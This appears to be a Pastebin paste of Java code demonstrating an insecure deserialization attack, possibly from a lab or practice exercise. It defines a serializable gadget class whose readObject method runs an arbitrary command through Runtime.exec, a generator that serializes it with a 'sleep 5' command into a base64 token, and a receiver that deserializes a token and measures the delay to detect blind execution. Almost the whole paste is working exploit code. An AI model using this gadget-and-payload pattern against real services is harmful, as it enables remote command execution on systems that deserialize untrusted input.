Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- rO0ABXNyAAxHYWRnZXRPYmplY3TwQKdCKLrR3AIAAUwAA2NtZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAHc2xlZXAgNQ==
- import java.io.Serializable;
- import java.text.StringCharacterIterator;
- import java.util.*;
- import java.io.*;
- public class GadgetObject implements Serializable {
- String cmd;
- private void readObject( ObjectInputStream stream ) throws Exception {
- Runtime.getRuntime().exec(cmd);
- }
- }
- import java.io.ByteArrayOutputStream;
- import java.io.ObjectOutputStream;
- import java.util.Base64;
- public class test {
- public static void main(String[] args) {
- GadgetObject go = new GadgetObject();
- go.cmd = "sleep 5";
- try{
- ByteArrayOutputStream bos = new ByteArrayOutputStream();
- ObjectOutputStream oos = new ObjectOutputStream(bos);
- oos.writeObject(go);
- oos.flush();
- byte[] exploit = bos.toByteArray();
- byte[] token = Base64.getEncoder().encode(exploit);
- System.out.println("encodedBytes " + new String(token));
- } catch(Exception e){
- System.out.println("cos poszlo nie tak");
- }
- }
- }
- import java.io.IOException;
- import java.io.ByteArrayInputStream;
- import java.io.ObjectInputStream;
- import java.util.Base64;
- public class lol {
- public static void main(String[] args) {
- String b64token;
- byte [] data;
- ObjectInputStream ois;
- Object o;
- long before, after;
- int delay;
- String token = "";
- b64token = token.replace('-', '+').replace('_', '/');
- try {
- data = Base64.getDecoder().decode(b64token);
- ois = new ObjectInputStream( new ByteArrayInputStream(data) );
- before = System.currentTimeMillis();
- try {
- o = ois.readObject();
- } catch (Exception e) {
- o = null;
- }
- after = System.currentTimeMillis();
- ois.close();
- delay = (int)(after - before);
- System.out.println(delay);
- } catch (Exception e) {
- System.out.println("cos poszlo nie tak");
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement